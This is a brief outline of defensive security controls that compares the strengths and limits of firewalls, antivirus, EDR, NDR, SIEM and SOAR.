Prevention
Firewalls
Strengths
- Centralized control of network traffic.
- Filters based on IP, port, protocol.
- Network segmentation reduces attack surface.
Limits
- Cannot detect malicious activity inside allowed traffic.
- Blind to internal traffic (unless segmented).
- Misconfigurations cause false positives.
Antivirus & EPP
Strengths
- Protects endpoints from known malware.
- Heuristic analysis for variants.
- Centralized management.
Limits
- Limited against APTs and fileless malware.
- Cannot prevent lateral movement alone.
Detection
EDR (Endpoint Detection & Response)
Advanced threat detection focusing on behavioral analysis rather than signatures.
Capabilities
- Continuous endpoint monitoring (processes, registry).
- Detects LOLBins and lateral movement.
- Automated containment (isolate host).
Weaknesses
- Requires agent deployment (gaps if missing).
- Can be bypassed by advanced attackers.
NDR (Network Detection & Response)
Monitors east-west traffic and detects anomalies in network flows.
- Detects lateral movement and C2 beaconing.
- Complements EDR where agents can't go (IoT, printers).
- Blind spot: Encrypted traffic (without TLS inspection).
Management & Orchestration
SIEM
Centralized log management, correlation, and alerting.
Critical Insight
SIEM does not replace endpoint or network monitoring; it only correlates the data already collected.
SOAR
Security Orchestration, Automation, and Response.
- Automates repetitive tasks (enrichment, blocking).
- Reduces Mean Time To Respond (MTTR).
- Warning: Requires high-quality detection upstream. No good input = No good output.